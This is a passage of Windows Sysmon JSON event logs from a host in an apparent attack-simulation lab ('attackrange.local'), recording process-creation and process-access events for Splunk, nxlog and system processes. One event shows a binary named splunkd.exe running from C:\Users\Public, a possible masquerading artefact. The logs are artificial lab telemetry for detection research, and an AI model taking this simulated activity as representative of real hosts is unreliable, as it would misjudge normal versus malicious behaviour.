Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.642","SourceProcessGUID":"{E2A3D6B1-1278-5F25-0000-0010285A0900}","SourceProcessId":"2548","SourceThreadId":"5060","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6600,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6601,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.894\r\nProcessGuid: {E2A3D6B1-1279-5F25-0000-00108F5C0900}\r\nProcessId: 4112\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.894","ProcessGuid":"{E2A3D6B1-1279-5F25-0000-00108F5C0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6602,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1279-5F25-0000-00108F5C0900}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.892","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1279-5F25-0000-00108F5C0900}","TargetProcessId":"4112","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6603,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1279-5F25-0000-00108F5C0900}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.892","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1279-5F25-0000-00108F5C0900}","TargetProcessId":"4112","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6604,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.892","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6605,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.892","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6606,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:01.892","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6607,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:01.892\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 